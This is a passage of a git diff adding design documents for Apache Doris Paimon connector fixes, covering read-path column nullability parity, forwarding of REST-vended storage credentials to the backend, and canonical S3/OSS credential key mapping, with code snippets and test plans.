asserting partition col = ISO date / shifted datetime (needs BE + warehouse). diff --git a/plan-doc/tasks/designs/P5-fix-FIX-READ-NOTNULL-design.md b/plan-doc/tasks/designs/P5-fix-FIX-READ-NOTNULL-design.md new file mode 100644 index 00000000000000..cf8f0381a1ab06 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-READ-NOTNULL-design.md @@ -0,0 +1,129 @@ +> **✅ USER DECISION (2026-06-11): restore legacy parity** — implement the recommended `boolean nullable = true;` in `PaimonConnectorMetadata.mapFields`. Do NOT propagate paimon NOT NULL; do NOT touch the shared `ConnectorColumnConverter`. + +# Problem + +On the paimon READ path, the new SPI connector propagates a paimon field's `NOT NULL` constraint into the resulting Doris `Column` (`isAllowNull=false`). The legacy `datasource/paimon` code path instead hard-coded every paimon-derived Doris column to `isAllowNull=true` (nullable), regardless of the paimon field's own nullability. + +This is a result-changing parity regression. The most common trigger is paimon **primary-key tables**: paimon forces every PK column to `NOT NULL`, so under the new path nearly every paimon PK table now exposes `NOT NULL` Doris columns where legacy exposed nullable ones. Nereids uses column nullability to drive null-rejecting simplifications (e.g. `IS NULL` folding, `Coalesce`/anti-join rewrites). When a `NOT NULL` external column can still produce a NULL at read time (schema-evolution default-fill, etc.), those simplifications can drop rows or misevaluate predicates — outcomes legacy never permitted because it always declared the column nullable. + +# Root Cause (confirmed in current code) + +The read-path column nullability is decided in exactly one place and is propagated verbatim through the bridge: + +- `fe/fe-connector/fe-connector-paimon/.../PaimonConnectorMetadata.java:945` — inside `mapFields(List, List)` (lines 939-954): + ```java + boolean nullable = field.type().isNullable(); // line 945 + columns.add(new ConnectorColumn(field.name().toLowerCase(), connectorType, comment, nullable, null)); + ``` + `mapFields` is the single mapping shared by both read entrypoints via `buildTableSchema` (line 207): + - latest path `getTableSchema(session, handle)` at lines 148-163 (`fields = table.rowType().getFields()`), + - at-snapshot path `getTableSchema(session, handle, snapshot)` at lines 181-197 (`fields = schema.fields()`). + +- The fe-core bridge does **not** re-force nullable: `fe/fe-core/.../ConnectorColumnConverter.java:65-70`: + ```java + return new Column(cc.getName(), dorisType, cc.isKey(), null, + cc.isNullable(), cc.getDefaultValue(), ...); // isAllowNull = cc.isNullable() + ``` + So a paimon `NOT NULL` field → `ConnectorColumn(nullable=false)` → Doris `Column(isAllowNull=false)`. `SlotReference.fromColumn` then sets the nereids slot nullability from `column.isAllowNull()`, reaching the optimizer. + +Legacy hard-codes nullable=`true`: +- `fe/fe-core/.../paimon/PaimonExternalTable.java:349-354` builds each column with the 8-arg `Column` ctor (`Column.java:256-257` = `(name, type, isKey, aggregateType, isAllowNull, comment, visible, colUniqueId)`), passing the **literal `true`** for `isAllowNull` (not `field.type().isNullable()`). +- `fe/fe-core/.../paimon/PaimonSysExternalTable.java:257-268` does the same (literal `true`) for system tables. + +Trigger universality confirmed: paimon's `Schema` normalization forces every primary-key field to `NOT NULL` (`copy(false)`), so PK tables — the core paimon case — flip nullability metadata under the new path. + +# Design + +**Restore legacy parity by forcing read-path Doris columns nullable in `mapFields`.** + +- The fix is a one-line behavioral change confined to the paimon connector module (`mapFields` in `PaimonConnectorMetadata.java`). This respects the connector no-fe-core-import rule: `mapFields` already lives entirely in the connector, builds `ConnectorColumn` (an fe-connector-api type), and touches no fe-core classes. +- **Do NOT** push the fix into `ConnectorColumnConverter.convertColumn` (fe-core, shared by every connector). MaxCompute and future connectors may legitimately want real nullability; the legacy paimon "always nullable" behavior is paimon-specific and belongs in the paimon connector. +- Complex-type child nullability (ARRAY item / MAP value / STRUCT field) is already reconstructed with Doris-default container nullability in `ConnectorColumnConverter.convertType` (review §10 overview), so the only divergence from legacy is the top-level `Column.isAllowNull` flag. Fixing `mapFields` fully closes the gap. + +**Parity-vs-improvement flag (needs user confirmation):** +This change is a **pure parity restore**. The alternative — keeping precise `NOT NULL` propagation — would be a behavior *improvement* only if the planner is guaranteed never to derive wrong results from a `NOT NULL` external column. That guarantee does not hold today (schema-evolution default-fill can surface NULLs into a paimon `NOT NULL` column at read time, and nereids is then permitted to fold null-rejecting predicates). Recommendation: take the parity restore now. If "precise nullability" is later desired, it must be a separate, explicitly gated decision with planner-correctness verification — not folded into this fix. + +# Implementation Plan + +File: `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java`, method `mapFields` (lines 939-954). + +Change line 945 from: +```java +boolean nullable = field.type().isNullable(); +``` +to (force nullable for legacy parity, with an explaining comment): +```java +// Legacy parity: PaimonExternalTable / PaimonSysExternalTable always built each Doris column +// with isAllowNull=true regardless of the paimon field's NOT NULL flag. Paimon PK columns are +// always NOT NULL, so propagating that would flip nullability metadata for almost every PK table +// and let nereids fold null-rejecting predicates the legacy path never permitted (rows can still +// read as NULL under schema-evolution default-fill). Keep columns nullable; do not propagate the +// paimon NOT NULL constraint on the read path. +boolean nullable = true; +``` + +Notes: +- `field` (`DataField`) is still referenced for name/type/comment, so no unused-variable issue. +- No signature change, no other call sites. `buildTableSchema` and both `getTableSchema` overloads inherit the fix automatically. +- No fe-core, fe-connector-api, or shared-converter edits. + +# Risk Analysis + +- **Parity vs legacy**: After the change, paimon read-path columns are nullable=true in both the latest and at-snapshot paths, exactly matching `PaimonExternalTable.java:349-354` and `PaimonSysExternalTable.java:257-268`. Net effect is to *remove* a divergence introduced by the SPI port. +- **Shared-code blast radius**: Zero. The edit is inside the paimon connector's private `mapFields`. `ConnectorColumnConverter` (shared with MaxCompute and future connectors) is untouched, so other connectors' nullability semantics are unaffected. +- **Edge cases**: + - System tables ($-suffixed) also flow through `mapFields`/`buildTableSchema`, so they too get restored to legacy `true` — matching `PaimonSysExternalTable`. + - Complex types: only the top-level column flag changes; ARRAY/MAP/STRUCT inner nullability is already Doris-default and unaffected. + - DDL / write path (`PaimonTypeMapping.toPaimonType`, `PaimonSchemaBuilder`) is a separate direction (Doris→paimon) and does not call `mapFields`; it is not touched and its `.copy(nullable)` behavior is preserved. + - `column.uniqueId` (Finding 10.2, MINOR) is a separate, unreachable-today gap and is intentionally out of scope here. +- **Downside of the restore**: a genuinely-NOT-NULL paimon column will now report nullable in Doris metadata (e.g. `DESC`/`SHOW CREATE TABLE` shows `NULL`). This is the long-standing legacy behavior, accepted as the cost of correctness; explicitly flagged above for user confirmation. + +# Test Plan + +## Unit Tests + +Location: `fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java` (offline harness: `RecordingPaimonCatalogOps` + `FakePaimonTable`, metadata built with a null real catalog). + +Build a `RowType` mixing a NOT NULL field and a nullable field. Paimon API confirmed (paimon-api `DataType.notNull()` / `nullable()`; `RowType.Builder.field(String, DataType)` preserves the type's own nullability; `DataTypes.INT()` is nullable by default): +```java +RowType rt = RowType.builder() + .field("id", DataTypes.INT().notNull()) // paimon NOT NULL (PK-like) + .field("val", DataTypes.INT()) // paimon nullable + .build(); +``` + +Test 1 — `getTableSchemaForcesColumnsNullableForLegacyParity` (latest path): +- Arrange a `FakePaimonTable` with the above rowType (PK = `["id"]`), set on `RecordingPaimonCatalogOps`; obtain a `PaimonTableHandle` via `getTableHandle`. +- Act: `ConnectorTableSchema schema = metadata.getTableSchema(null, handle);` +- Assert: for the `id` column, `schema.getColumns().get(0).isNullable() == true` (and `val` too). +- WHY comment: encodes intent — "legacy always declared paimon columns nullable so nereids cannot fold null-rejecting predicates on a NOT NULL external column; a paimon PK NOT NULL field MUST still surface as nullable to Doris." MUTATION that makes it red: reverting `mapFields` to `field.type().isNullable()` (the `id` column becomes `isNullable()==false`). +- This FAILS before the fix (today `id` is non-nullable) and PASSES after. + +Test 2 — `getTableSchemaAtSnapshotAlsoForcesNullable` (at-snapshot path): +- Drive `getTableSchema(session, handle, snapshot)` with a snapshot whose `getSchemaId() >= 0`, using `RecordingPaimonCatalogOps.schemaAt` to return a `PaimonSchemaSnapshot` whose `fields()` include the NOT NULL `id`. +- Assert the same nullable=true outcome. +- WHY comment: the two read entrypoints share `mapFields`; this pins that the snapshot/time-travel read path also obeys legacy nullable parity and cannot drift from the latest path. + +(If the at-snapshot fake plumbing is heavier than the existing harness supports, Test 2 may be folded into Test 1's assertions by exercising whichever `getTableSchema` overload the harness already drives elsewhere in this file; the load-bearing assertion is `isNullable()==true` on the NOT NULL field. Both overloads route through line 945, so one well-placed assertion is sufficient to fail-before/pass-after; the second test is added for explicit drift protection.) + +## E2E Tests + +No new live test required for the fix itself; the connector UT above fully covers the metadata-level behavior offline. The downstream *correctness* consequence (planner folding null-rejecting predicates on a NOT NULL external column that reads NULL via schema evolution) is a live-only scenario: it needs a real paimon table, a schema-evolution-added NOT NULL column, and the BE read path, which the offline harness cannot reproduce. Any such regression check belongs in the existing paimon regression-test suite (live-only / CI-gated behind real paimon catalog credentials) and is out of scope for this unit-level parity restore. Flag for the user: if they want an end-to-end guard, it should assert that a query with an `IS NULL` / `COALESCE` predicate over a paimon PK column returns the same rows as legacy. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — build+UT green (PaimonConnectorMetadataTest 12/0, incl. 2 new; imports clean; HEAD uncommitted).** + +## Fix (1 production file: `PaimonConnectorMetadata.java`, method `mapFields`) +Changed the single line `boolean nullable = field.type().isNullable();` → `boolean nullable = true;` (with an explaining comment). Pure connector, no fe-core / shared-converter edit. Both read entrypoints (`getTableSchema` latest + at-snapshot) inherit the fix via the shared `buildTableSchema`/`mapFields`. + +## Tests (2 new in `PaimonConnectorMetadataTest`) +- `getTableSchemaForcesColumnsNullableForLegacyParity`: a paimon `INT().notNull()` (PK) field surfaces as `isNullable()==true`. +- `getTableSchemaAtSnapshotAlsoForcesNullable`: the at-snapshot path (`schemaAt` seam + `ConnectorMvccSnapshot.builder().schemaId(5)`) also forces nullable (drift protection). + +## Note +- Write path (`PaimonTypeMapping.toPaimonType` / `PaimonSchemaBuilder`, Doris→paimon) is the opposite direction and does NOT call `mapFields` — untouched (its `PaimonSchemaBuilderTest`/`PaimonTypeMappingToPaimonTest` nullable assertions are about that direction and are unaffected). + +## Live-e2e (gated, NOT run): IS NULL / COALESCE over a paimon PK column vs legacy rows. diff --git a/plan-doc/tasks/designs/P5-fix-FIX-REST-VENDED-design.md b/plan-doc/tasks/designs/P5-fix-FIX-REST-VENDED-design.md new file mode 100644 index 00000000000000..5ad5dcaf06b515 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-REST-VENDED-design.md @@ -0,0 +1,174 @@ +# Problem + +A Paimon catalog created with `'type'='paimon','paimon.catalog.type'='rest'` against a REST server that vends **per-table temporary cloud-storage credentials** (e.g. DLF/Aliyun OSS or S3 STS tokens) returns no usable storage credentials to BE on the SPI read path. Any `SELECT` over such a table that lands on the **native ORC/Parquet reader** (the common case) sends BE a scan-range location-properties map with *no* valid `AWS_*` credentials, so the object-store client fails with access-denied / 403 and the data files are unreadable. Legacy (pre-SPI) Paimon read succeeded because it fetched the per-table vended token in `PaimonScanNode.doInitialize()` and pushed the normalized credentials to BE. + +Scope clarification (from the review, confirmed): the JNI reader path is **not** broken — BE's `PaimonJniScanner` deserializes the `RESTTokenFileIO` (its `catalogContext`/`identifier`/`path`/`token` fields are non-transient) and self-serves credentials. Only **native-reader-eligible REST tables** lose credentials. Because native read is the default for ORC/Parquet, this is a BLOCKER. + +# Root Cause (confirmed in current code) + +The SPI scan path never extracts vended credentials from the live Paimon `Table`'s `RESTTokenFileIO`, and the only credential keys it forwards to BE are *static* catalog-level keys. + +- `PaimonScanPlanProvider.getScanNodeProperties` (`fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java:306-315`) emits BE storage properties **only** by copying static entries from the catalog `properties` map whose key starts with `hadoop.`/`fs.`/`dfs.`/`hive.`/`s3.`/`cos.`/`oss.`/`obs.`, re-keyed as `location.`. There is zero per-table token extraction. The resolved live `Table` (with its `RESTTokenFileIO`) is in hand at `PaimonScanPlanProvider.java:265` (`resolveScanTable(paimonHandle)`) but its `fileIO()` is never consulted. +- `PluginDrivenScanNode.getLocationProperties` (`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java:307-317`) just strips the `location.` prefix and ships the remainder verbatim to BE as `params.setProperties(...)`. +- BE's native S3/object-store client (`be/src/util/s3_util.cpp:541-561`, keys defined at `:146-150`) consumes **only** normalized `AWS_ACCESS_KEY` / `AWS_SECRET_KEY` / `AWS_TOKEN` / `AWS_ENDPOINT` / `AWS_REGION`. It does **not** understand raw paimon token keys (`fs.oss.accessKeyId`, `s3.access-key`, …). So even the static `location.s3.*` passthrough would not produce working credentials without normalization — and the vended token is never fetched at all. + +Legacy reference that the SPI path dropped: +- `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/source/PaimonScanNode.java:170-176` — in `doInitialize()` legacy calls `VendedCredentialsFactory.getStoragePropertiesMapWithVendedCredentials(metastoreProps, baseStorageMap, source.getPaimonTable())`, then `CredentialUtils.getBackendPropertiesFromStorageMap(...)` (`:176`) to get the BE-facing `AWS_*` map, returned to BE via `getLocationProperties()` (`:650-651`). +- `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/PaimonVendedCredentialsProvider.java:48-68` — `extractRawVendedCredentials` pulls the raw token via `((RESTTokenFileIO) table.fileIO()).validToken().token()`. +- `fe/fe-core/src/main/java/org/apache/doris/datasource/credentials/AbstractVendedCredentialsProvider.java:43-83` + `CredentialUtils.java:55-87` — filter to cloud prefixes, run `StorageProperties.createAll(...)` (normalizes arbitrary token key shapes + derives region/endpoint), then `getBackendConfigProperties()` → the `AWS_*` map. + +The normalization (`StorageProperties.createAll`) recognizes many key aliases and derives region from endpoint; it lives in `org.apache.doris.datasource.property.storage.*` (fe-core). The connector module **must not import fe-core**, so it cannot call `StorageProperties.createAll` directly. This is the core constraint shaping the design. + +# Design + +Restore legacy timing/scope (per-table token fetched at scan-plan time on the live, snapshot-pinned `Table`) while keeping the heavy `StorageProperties` normalization on the fe-core side, reached through a new **`ConnectorContext` SPI hook**. This mirrors how the connector already routes other fe-core-only concerns (`executeAuthenticated`, `sanitizeJdbcUrl`) through `ConnectorContext`. + +Two-part split: +1. **Connector side (pure paimon SDK, no fe-core):** extract the raw vended token from the resolved `Table`'s `RESTTokenFileIO`. This is exactly the body of legacy `PaimonVendedCredentialsProvider.extractRawVendedCredentials`, but living in the connector and using only `org.apache.paimon.rest.RESTTokenFileIO` / `RESTToken` (both on the connector's compile classpath via `paimon-core`→`paimon-common`; verified `RESTTokenFileIO`/`RESTToken` present in `paimon-common-1.3.1.jar` / `paimon-hive-connector-3.1-1.3.1.jar`). +2. **fe-core bridge (via new `ConnectorContext.vendStorageCredentials(rawToken)` default hook):** take the raw token map and return the BE-facing normalized map by delegating to the *existing* `StorageProperties.createAll(...)` + `CredentialUtils.getBackendPropertiesFromStorageMap(...)` machinery. The default is a no-op (`return Collections.emptyMap()`); `DefaultConnectorContext` overrides it using the catalog's `CatalogProperty` (already available to `PluginDrivenExternalCatalog`, which constructs the context). The connector emits each returned `` as `location.`. + +Why a `ConnectorContext` hook and not re-porting normalization into the connector: +- `StorageProperties.createAll` is large, alias-rich, and fe-core-resident; re-porting it violates "minimal change" and "no fe-core import," and would silently drift from the canonical normalization (the sibling P9 S3/OSS finding shows how partial re-ports lose keys). +- The hook keeps a single source of truth and matches the legacy data flow 1:1 (raw token → `StorageProperties.createAll` → `getBackendConfigProperties`). +- Timing/scope parity: the connector calls the hook inside `getScanNodeProperties` on the already-resolved, snapshot-pinned `Table` — same point legacy fetched it (per scan, per table). + +Gating parity: legacy only vends for REST (`isVendedCredentialsEnabled` ⇔ `PaimonRestMetaStoreProperties`). The connector gates on the table actually carrying a `RESTTokenFileIO` (`table.fileIO() instanceof RESTTokenFileIO`), which is strictly equivalent for the read path and needs no metastore-type plumbing. Non-REST flavors return an empty raw map → hook not called → behavior unchanged. + +Static-vs-vended precedence: legacy merges base storage map then overlays vended (`getStoragePropertiesMapWithVendedCredentials` replaces base when vended succeeds). The connector keeps emitting the existing static `location.*` keys, then overlays the vended `location.AWS_*` keys (vended wins on collision), preserving legacy semantics for hybrid catalogs. + +# Implementation Plan + +### 1. New SPI hook — `ConnectorContext.vendStorageCredentials` +File: `fe/fe-connector/fe-connector-spi/src/main/java/org/apache/doris/connector/spi/ConnectorContext.java` + +Add a default method (no-op so all other connectors/tests are unaffected): +```java +/** + * Normalizes raw per-table vended cloud-storage credentials (the token map a REST + * catalog returns, e.g. fs.oss.accessKeyId / s3.access-key) into the BE-facing + * storage-property map (AWS_ACCESS_KEY / AWS_SECRET_KEY / AWS_TOKEN / AWS_ENDPOINT / + * AWS_REGION). The engine performs the same StorageProperties normalization it uses + * for static catalog credentials. Returns an empty map when the input is empty or the + * deployment has no normalization machinery. + */ +default Map vendStorageCredentials(Map rawVendedCredentials) { + return Collections.emptyMap(); +} +``` + +### 2. fe-core bridge — `DefaultConnectorContext` +File: `fe/fe-core/src/main/java/org/apache/doris/connector/DefaultConnectorContext.java` + +`DefaultConnectorContext` is constructed in `PluginDrivenExternalCatalog.createConnectorFromProperties` (`:148-150`), which has `catalogProperty`. Thread a `Supplier` (or the two derived inputs) into the context and implement the override by reusing the *existing* legacy helpers (no new normalization logic): +```java +@Override +public Map vendStorageCredentials(Map rawVendedCredentials) { + if (rawVendedCredentials == null || rawVendedCredentials.isEmpty()) { + return Collections.emptyMap(); + } + try { + Map filtered = CredentialUtils.filterCloudStorageProperties(rawVendedCredentials); + if (filtered.isEmpty()) { + return Collections.emptyMap(); + } + List vended = StorageProperties.createAll(filtered); + Map map = vended.stream() + .collect(Collectors.toMap(StorageProperties::getType, Function.identity())); + return CredentialUtils.getBackendPropertiesFromStorageMap(map); + } catch (Exception e) { + LOG.warn("Failed to normalize vended credentials", e); + return Collections.emptyMap(); // fail soft, same as legacy provider + } +} +``` +Construction change: at `PluginDrivenExternalCatalog.java:150` pass the catalog property supplier into the `DefaultConnectorContext` ctor (new overload); `CatalogFactory.java:106` keeps the no-property overload (no vended support there — only the plugin-driven live path needs it). Note: this reuses `AbstractVendedCredentialsProvider`'s exact normalization steps; it does NOT add new credential logic. (Alternative, even smaller: call `PaimonVendedCredentialsProvider`/`VendedCredentialsFactory` indirectly is not possible here because the connector has already extracted the raw token; passing the raw map to `StorageProperties.createAll` is the precise tail of the legacy flow.) + +### 3. Connector — extract token + emit normalized location keys +File: `fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java` + +Thread `ConnectorContext` into the provider: +- `PaimonConnector.getScanPlanProvider()` (`PaimonConnector.java:91-95`): pass `context` into a new `PaimonScanPlanProvider(properties, catalogOps, context)` ctor (keep existing 2-arg ctor for the offline unit tests that pass no context, or default `context=null`). + +Add a pure static extractor (port of legacy `extractRawVendedCredentials`, paimon-SDK-only): +```java +static Map extractVendedToken(Table table) { + if (table == null) { + return Collections.emptyMap(); + } + FileIO fileIO = table.fileIO(); + if (!(fileIO instanceof RESTTokenFileIO)) { + return Collections.emptyMap(); + } + RESTToken token = ((RESTTokenFileIO) fileIO).validToken(); + Map raw = token == null ? null : token.token(); + return raw == null ? Collections.emptyMap() : new HashMap<>(raw); +} +``` +In `getScanNodeProperties`, after the existing static `location.*` loop (`PaimonScanPlanProvider.java:306-315`), overlay vended creds (only when a context is present): +```java +if (context != null) { + Map vendedBeProps = + context.vendStorageCredentials(extractVendedToken(table)); + for (Map.Entry e : vendedBeProps.entrySet()) { + props.put("location." + e.getKey(), e.getValue()); // vended overlays static + } +} +``` +`table` here is `resolveScanTable(paimonHandle)` (already at `:265`), so the token is fetched on the live, snapshot-pinned table — legacy timing/scope. + +### 4. Test fake plumbing +File: `fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/FakePaimonTable.java` + +`FakePaimonTable.fileIO()` currently throws (`:122-125`). Add a settable `FileIO fileIO` field (default `null`, with a `setFileIO(...)`), returning it from `fileIO()` so the scan tests can inject a hand-written `RESTTokenFileIO`-shaped double. (See Test Plan for the no-Mockito approach — the module forbids Mockito.) + +Files touched (summary): `ConnectorContext.java` (SPI), `DefaultConnectorContext.java` + `PluginDrivenExternalCatalog.java` (fe-core bridge wiring), `PaimonScanPlanProvider.java` + `PaimonConnector.java` (connector), `FakePaimonTable.java` (test fake), plus the new/extended tests below. + +# Risk Analysis + +- **Parity vs legacy:** The normalization path (`filterCloudStorageProperties` → `StorageProperties.createAll` → `getBackendConfigProperties`) is *identical* to legacy; only the token-extraction site moves into the connector. The gate changes from "metastore is `PaimonRestMetaStoreProperties`" to "table's `fileIO` is `RESTTokenFileIO`" — equivalent for the read path (a REST catalog table yields a `RESTTokenFileIO`; non-REST yields a different `FileIO`), and strictly more precise (won't try to vend on a REST catalog table that happens to have a non-token FileIO). Fail-soft on any extraction/normalization error matches legacy (`AbstractVendedCredentialsProvider` returns null/empty on exception). +- **Shared-code blast radius:** The new `ConnectorContext` method is a `default` no-op, so every other connector (maxcompute, etc.) and every existing `ConnectorContext` implementation (including the test `RecordingConnectorContext`) compiles and behaves unchanged. The `DefaultConnectorContext` ctor gains an overload; the existing 2-arg/3-arg ctors are preserved, and `CatalogFactory.java:106` keeps using the no-vended overload, so non-plugin-driven paths are untouched. The `PluginDrivenExternalCatalog` change only adds a supplier argument. +- **Static-key precedence:** Overlaying vended after static means a catalog that *also* set static `s3.*` keys gets the vended token winning — matches legacy (`getStoragePropertiesMapWithVendedCredentials` replaces base with vended when vended succeeds). Note static `location.s3.*` keys remain raw (un-normalized) and are not consumed by BE's native S3 client — that's the separate sibling P9 finding and out of scope here; this fix does not regress it. +- **Token freshness / expiry:** `validToken()` returns a currently-valid token at plan time (legacy did the same in `doInitialize`). Long-running scans that outlive token TTL are a pre-existing legacy limitation, not introduced here. +- **Edge cases:** empty token map → empty overlay (no-op); non-REST FileIO → empty (no-op); `context == null` (offline unit tests using the 2-arg ctor) → skipped, so the offline harness keeps working; null `validToken()`/`token()` → empty, no NPE. JNI path unchanged (it never used `location.*` creds; BE self-serves from the serialized `RESTTokenFileIO`). +- **No-fe-core-import rule:** The connector only references `org.apache.paimon.rest.{RESTToken,RESTTokenFileIO}` and `org.apache.paimon.fs.FileIO` (paimon SDK) plus the `ConnectorContext` SPI. No `org.apache.doris.datasource.*` import added to the connector. Verified the classes resolve from `paimon-core`/`paimon-common` on the connector classpath. + +# Test Plan + +## Unit Tests +All connector-side tests must use **hand-written fakes, no Mockito** (the module's harness comment and `pom.xml` forbid Mockito). Provide a tiny hand-written `RESTTokenFileIO` double is not possible (it's a concrete class with no no-arg ctor and a final-ish `validToken`), so split tests at the two seams: + +1. `PaimonScanPlanProviderTest.extractVendedToken_*` (new, in connector test dir): + - Because `extractVendedToken` keys on `instanceof RESTTokenFileIO`, drive it with a `FakePaimonTable` whose `fileIO()` returns (a) `null`, (b) a plain hand-written `FileIO` double (not a `RESTTokenFileIO`), and assert an **empty** map — proving non-REST tables vend nothing (INTENT: never leak/attempt vended creds for non-REST). The positive `RESTTokenFileIO.validToken()` branch is covered by the bridge test + E2E (a `RESTTokenFileIO` cannot be hand-constructed offline without a live REST stack). FAILS before if extraction logic were wrong; the current code has no extraction at all, so these tests pin the new contract. + +2. `PaimonScanPlanProviderTest.getScanNodeProperties_overlaysVendedCreds` (new): use a hand-written `ConnectorContext` double whose `vendStorageCredentials(raw)` returns a fixed map `{AWS_ACCESS_KEY=ak, AWS_SECRET_KEY=sk, AWS_TOKEN=tok, AWS_ENDPOINT=ep}` regardless of input, wire it through the 3-arg `PaimonScanPlanProvider` ctor with a `FakePaimonTable`. Assert the returned props contain `location.AWS_ACCESS_KEY=ak` … and that a colliding static key is overridden by the vended value. This FAILS before the fix (no overlay loop, no context param) and PASSES after. INTENT: the connector forwards normalized vended creds to BE under `location.*` with vended-wins precedence. + +3. `PaimonScanPlanProviderTest.getScanNodeProperties_noContext_unchanged` (new): construct with the 2-arg ctor (`context == null`) and assert the property set equals the pre-fix static-only set — guards the offline path and proves no NPE / no behavior change when the hook is absent. + +4. `DefaultConnectorContextVendTest` (new, fe-core test dir — fe-core may use Mockito/real objects): feed a raw OSS token map (`fs.oss.accessKeyId`/`fs.oss.accessKeySecret`/`fs.oss.securityToken`/`fs.oss.endpoint`, mirroring `PaimonVendedCredentialsProviderTest`) into `vendStorageCredentials` and assert the result contains the normalized BE keys `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_TOKEN`/`AWS_ENDPOINT` (and that an empty input yields empty). This pins that the bridge reuses `StorageProperties.createAll` correctly and matches the legacy `PaimonVendedCredentialsProviderTest` + `getBackendPropertiesFromStorageMap` expectations (which already asserts `AWS_*` keys at `PaimonVendedCredentialsProviderTest.java:286-291`). FAILS before (method is a no-op default) and PASSES after. + +5. `RecordingConnectorContext` (connector test fake) needs no change — it inherits the no-op default, confirming the SPI addition is backward compatible. + +## E2E Tests +- A regression case under `regression-test/` analogous to the existing `test_paimon_s3.groovy`, but for a **REST/DLF catalog that vends per-table OSS/S3 credentials with no static `s3.*`/`oss.*` keys**, then `SELECT` a native-readable (ORC/Parquet) table and assert correct rows. This is **live-only / CI-skipped**: it requires a real Paimon REST server (or DLF) that issues vended STS tokens and a private OSS/S3 bucket — there is no offline double for `RESTTokenFileIO.validToken()` (it calls the REST server). Mark it gated behind the existing live-credential regression conf (same gating model as the live `PaimonLiveConnectivityTest`). The unit tests above cover the FE-side wiring deterministically; the E2E validates the end-to-end BE read with a real vended token. + +--- + +# ✅ IMPL SUMMARY (2026-06-11) + +**Status: DONE — connector UT green (PaimonScanPlanProviderTest 15/0); fe-core UT green (DefaultConnectorContextVendTest 2/0); fe-core compiles; imports clean; HEAD uncommitted.** + +## Fix (SPI + fe-core bridge + connector; default-no-op so other connectors unaffected) +- `ConnectorContext.java` (fe-connector-spi): added `default Map vendStorageCredentials(Map raw)` → empty. +- `DefaultConnectorContext.java` (fe-core): override replicates the EXACT legacy `AbstractVendedCredentialsProvider` tail — `CredentialUtils.filterCloudStorageProperties` → `StorageProperties.createAll` → `Collectors.toMap(StorageProperties::getType, identity)` → `CredentialUtils.getBackendPropertiesFromStorageMap`; fail-soft (empty) on any error. Added LOG + imports. +- `PaimonScanPlanProvider.java` (connector): 3-arg ctor adding `ConnectorContext context` (2-arg delegates with null for offline tests); pure static `extractVendedToken(Table)` (port of legacy `extractRawVendedCredentials`, paimon SDK only — gates on `fileIO() instanceof RESTTokenFileIO`); `getScanNodeProperties` overlays `context.vendStorageCredentials(extractVendedToken(table))` as `location.*` AFTER the static loop (vended wins on collision). +- `PaimonConnector.java`: `getScanPlanProvider()` passes `context` to the 3-arg ctor. + +## Tests +- `PaimonScanPlanProviderTest` (3 new): extractVendedToken empty for null/non-REST FileIO (uses `LocalFileIO` as a real non-REST double); getScanNodeProperties overlays vended AWS_* (with vended-wins-on-collision); no-context path unchanged. +- `DefaultConnectorContextVendTest` (new fe-core): a raw OSS token normalizes to `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/`AWS_TOKEN`; empty/null → empty. Exercises the REAL StorageProperties normalization (the connector tests use a fake context). +- `FakePaimonTable` test fake: `fileIO()` now returns a settable field (was throw). + +## Deviation from design (documented, simpler + lower blast-radius) +The design's "Construction change" said to thread a `Supplier` into the `DefaultConnectorContext` ctor and change `PluginDrivenExternalCatalog`/`CatalogFactory`. **Not needed**: the shown impl (and the actual fix) uses ONLY the `rawVendedCredentials` param — `StorageProperties.createAll(filtered)` is self-contained. So NO ctor change, NO `PluginDrivenExternalCatalog`/`CatalogFactory` change. The connector's `context` is already a `DefaultConnectorContext` (built at `PluginDrivenExternalCatalog:150`), so `context.vendStorageCredentials(...)` resolves to the override regardless. + +## Live-e2e (gated, NOT run): a REST/DLF catalog vending per-table OSS/S3 STS tokens (no static keys) → SELECT a native-readable table; needs a live REST server + private bucket (no offline double for `RESTTokenFileIO.validToken()`). diff --git a/plan-doc/tasks/designs/P5-fix-FIX-STORAGE-CREDS-design.md b/plan-doc/tasks/designs/P5-fix-FIX-STORAGE-CREDS-design.md new file mode 100644 index 00000000000000..af468a978ac157 --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-FIX-STORAGE-CREDS-design.md @@ -0,0 +1,248 @@ +# Problem + +A Paimon catalog created through the new SPI connector with the **canonical Doris storage keys** silently loses every storage credential, so live reads against private S3/OSS buckets fail. + +Two concrete live-reachable failures (paimon is in `SPI_READY_TYPES`): + +1. **filesystem flavor + S3/OSS** (review path 9, Finding 9.1, BLOCKER 3/0/0). A user (and the shipped regression `test_paimon_s3.groovy:70-72`) passes the documented keys: + ``` + 'paimon.catalog.type'='filesystem', + 'warehouse'='s3://bucket/wh', + 's3.access_key'=..., 's3.secret_key'=..., 's3.endpoint'='s3.ap-east-1.amazonaws.com' + ``` + `buildHadoopConfiguration` → `applyStorageConfig` recognizes none of `s3.access_key / s3.secret_key / s3.endpoint`. The resulting Hadoop `Configuration` has zero `fs.s3a.*` keys, so the Paimon FileSystem catalog hits S3 with no credentials → FE-side auth/access-denied exception at plan time. + +2. **DLF flavor + OSS** (review path 9, Finding 9.2, BLOCKER 3/0/0; path 8 DLF). `requireOssStorageForDlf` passes when ANY `oss./fs.oss./paimon.fs.oss.` key is present, but `buildDlfHiveConf` then overlays storage only via the same `applyStorageConfig`. Canonical `oss.access_key / oss.secret_key / oss.endpoint / oss.region` are dropped, and `fs.oss.impl` (JindoOSS) is never set. The gate says "OSS configured" yet the HiveConf carries no usable OSS FileIO config → DLF/HMS catalog cannot read OSS data files. + +Scope note (from review reproducibility lens): real-world symptom is an FE-side auth/access-denied exception during planning, not a literal "0 rows". Core claim (credentials dropped) holds. + +# Root Cause (confirmed 